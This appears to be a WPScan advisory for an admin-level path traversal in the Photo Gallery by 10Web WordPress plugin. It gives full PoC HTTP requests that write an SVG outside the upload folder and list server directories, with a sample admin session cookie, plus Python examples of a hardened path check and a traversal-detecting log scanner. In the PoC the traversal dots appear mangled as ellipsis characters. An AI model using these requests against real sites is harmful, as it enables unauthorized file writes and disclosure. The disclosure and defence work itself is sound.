wpvulndb | Nguyen Huu Do | WPVDB-ID: C8917BA2-4CB3-4B09-8A49-B7C612254946
History: Mar 27, 2023 - 12:00 a.m.

Photo Gallery by 10Web < 1.8.15 - Admin+ Path Traversal

2023-03-27 00:00:00
Nguyen Huu Do
wpscan.com
10
Tags: path traversal vulnerability, file upload, high privilege user, image gallery

EPSS: 0.001 (Low)
EPSS Percentile: 23.5%

- The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high-privilege users to write images anywhere on the filesystem (within the web server user's permissions) via a path traversal vector.
- The same path traversal also allows listing folders and image files elsewhere on the system.
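The containment check the advisory implies is missing, as an added example that is not the plugin's own code: the plugin is PHP, so this is a Python stand-in for the same logic (the PHP equivalent is realpath() followed by a segment-wise prefix test). It shows where an unchecked dir value lands when it is simply appended, the hardened resolver beside it, and why a plain string-prefix comparison is not enough. BASE_DIR is an assumed install path and the probe values are constructed; nothing needs to exist on disk.

```python
"""Unchecked vs. hardened handling of a caller-supplied upload subdirectory.

Added example, not the plugin's code. BASE_DIR is an assumed WordPress
layout; os.path.realpath() normalises paths that do not exist, so the demo
runs anywhere.
"""
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/html/wp-content/uploads/photo-gallery"  # assumed path


class PathTraversalError(ValueError):
    """A caller-supplied directory would land outside the upload folder."""


def vulnerable_target(base_dir: str, user_dir: str) -> str:
    """Where a file lands when the request's dir value is simply appended.

    This is the behaviour the advisory describes: no containment check, so a
    value such as '/../../../' walks out of the plugin folder.
    """
    return os.path.normpath(base_dir.rstrip("/") + "/" + user_dir)


def hardened_target(base_dir: str, user_dir: str) -> str:
    """Resolve user_dir under base_dir, refusing anything that escapes it.

    1. percent-decode exactly once (match the web layer; decoding a second
       time would re-open the hole for %252e%252e)
    2. treat the value as relative by stripping leading separators
    3. canonicalise with realpath: collapses '.', '..', '//' and symlinks
    4. require base_dir to be a prefix of the result, whole segments only
    """
    base_real = os.path.realpath(base_dir)
    relative = unquote(user_dir).lstrip("/\\")
    candidate = os.path.realpath(os.path.join(base_real, relative))
    # commonpath compares whole path segments. A plain
    # candidate.startswith(base_real) would wrongly accept a sibling
    # directory such as '.../photo-gallery_evil'.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathTraversalError(
            f"{user_dir!r} resolves to {candidate}, outside {base_real}"
        )
    return candidate


def is_contained(base_dir: str, user_dir: str) -> bool:
    """True when hardened_target() accepts user_dir, False when it rejects it."""
    try:
        hardened_target(base_dir, user_dir)
    except PathTraversalError:
        return False
    return True


if __name__ == "__main__":
    # Constructed probes: a normal album, the PoC-style traversal, the same
    # traversal percent-encoded, a sibling-directory trick that defeats a
    # startswith() check, and a double-encoded value that stays a literal name.
    for probe in ("album1/", "/../../../", "%2e%2e/%2e%2e/",
                  "../photo-gallery_evil/", "%252e%252e/"):
        safe = is_contained(BASE_DIR, probe)
        print(f"{probe!r:26} unchecked -> {vulnerable_target(BASE_DIR, probe)}")
        print(f"{'':26} hardened  -> "
              f"{hardened_target(BASE_DIR, probe) if safe else 'rejected'}")
```

The realpath step matters more than any dot-filtering: it is what turns `..`, doubled slashes and symlinks into a single canonical string that can be compared against the upload root.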

PoC

- The request below puts the svg_to_xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/:

POST /wordpress/wp-admin/admin-ajax.php?bwg_nonce=77c06f6311&action=bwg_upl&dir=/…//…//…// HTTP/1.1
Host: {host}
Content-Length: 2845
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysAMZOiWPOOk33DG8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Cookie: {cookie}

------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="bwg_nonce"

70ebb31e6c
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=0&bwg_height=0&callback=bwg_add_image&bwg_nonce=b37a4be11b
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_width"

500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_height"

500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_width"

1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_height"

1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="task"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="callback"

bwg_add_image
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_by"

date_modified
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_order"

desc
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="items_view"

thumbs
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="dir"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_names"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_namesML"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_new_name"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="new_dir_name"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_task"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_files"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_src"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_dest"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="files[]"; filename="svg_to_xss.svg"
Content-Type: image/svg+xml

------WebKitFormBoundarysAMZOiWPOOk33DG8--

- The request below lists the folders and image files outside the plugin's upload directory via the same traversal in the dir parameter:

POST /wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=800&bwg_height=550&callback=bwg_add_preview_image&bwg_nonce=b37a4be11b& HTTP/1.1
Host: localhost
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7C7fee9203d7bfbbc77f90d0a9b9872d0ea8bf7b1ccfa9f43ced48936bbc98b05c; wordpress_test_cookie=WP%20Cookie%20check; pvc_visits[0]=1677949198b1; wp_lang=en_US; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7Cb76a29cd3f196f659d63ecb2bf9c7bb4d158aa0b03f274379bf45e4162030338; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1677909222; tk_ai=%2B8CRtWYwxLjZLIFmx4D5%2FaoH; redux_current_tab=settings; redux_current_tab_get=settings; redux_current_tab_wpml_settings=1; wordpress_apbct_antibot=0050792dac2aebc2f8264b54205dbd73de813c365ef1d1d92377c094cf3bc336; ct_paused_spam_check=0; apbct_check_comments_offset=200; ct_check_users__amount=100; ct_paused_users_check=0; apbct_check_users_offset=0

bwg_nonce=70ebb31e6c&dir=/…//…//…//…//…//…//
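Detection logic for the shape of the first PoC request, as an added example that is not from the advisory or the plugin: it scans web-server access-log lines in combined format for admin-ajax.php calls using the actions seen above (bwg_upl, addImages) whose dir parameter contains a `..` segment after percent-decoding. Access logs carry only the query string; the second PoC sends dir in the POST body, so that variant needs a source that records request bodies (a WAF or ModSecurity audit log, for example). The log lines are constructed, use a conventional `../` sequence as the payload, and take their addresses from documentation ranges.

```python
"""Flag admin-ajax.php requests whose dir parameter traverses directories.

Added example, not from the advisory or the plugin. Works on access-log
lines in Apache/nginx "combined" format, so it only sees the query string.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# combined format: client, identd, user, [timestamp], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Plugin AJAX actions used by the PoC requests above.
WATCHED_ACTIONS = ("bwg_upl", "addImages")

# Constructed sample, not taken from any real server. IPs are from
# documentation ranges; the traversal payload is a conventional '../'.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Mar/2023:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=bwg_upl&dir=/../../../&bwg_nonce=77c06f6311 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Mar/2023:10:01:09 +0000] "POST /wp-admin/admin-ajax.php?action=bwg_upl&dir=%2F%2E%2E%2F%2E%2E%2F&bwg_nonce=77c06f6311 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [27/Mar/2023:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=bwg_upl&dir=/album1/&bwg_nonce=77c06f6311 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
198.51.100.2 - - [27/Mar/2023:10:03:11 +0000] "GET /wp-admin/admin-ajax.php?action=addImages&bwg_width=800&bwg_height=550&dir=..%2F..%2F..%2F HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.9 - - [27/Mar/2023:10:04:00 +0000] "GET /index.php?p=1 HTTP/1.1" 200 3000 "-" "curl/7.81"
"""


def is_traversal(value: str, max_decode: int = 3) -> bool:
    """True when value contains a '..' path segment after percent-decoding.

    Decoding repeats (bounded) so a double-encoded %252e%252e is caught too:
    for detection it is better to over-decode than to miss a variant. A name
    such as '....' is a literal directory, not a traversal, and is not flagged.
    """
    decoded = value
    for _ in range(max_decode):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return any(segment == ".." for segment in re.split(r"[\\/]+", decoded))


def find_traversal_uploads(log_text: str, actions=WATCHED_ACTIONS) -> list:
    """Return one finding per admin-ajax.php request whose dir value traverses."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        url = urlsplit(match["target"])
        if not url.path.endswith("/admin-ajax.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        action = params.get("action", [""])[0]
        if action not in actions:
            continue
        for dir_value in params.get("dir", []):
            if is_traversal(dir_value):
                findings.append({
                    "ip": match["ip"],
                    "time": match["ts"],
                    "action": action,
                    "status": int(match["status"]),
                    "dir": dir_value,
                })
    return findings


if __name__ == "__main__":
    for hit in find_traversal_uploads(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} action={hit["action"]} '
              f'dir={hit["dir"]!r} status={hit["status"]}')
```

The status code is kept in each finding because a 200 on a traversal attempt is the signal that the unpatched plugin accepted it; on a patched install the same request should fail, which turns the rule from an incident indicator into a scanner-activity indicator.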

CPE
Name            Operator    Version
photo-gallery   lt          1.8.15

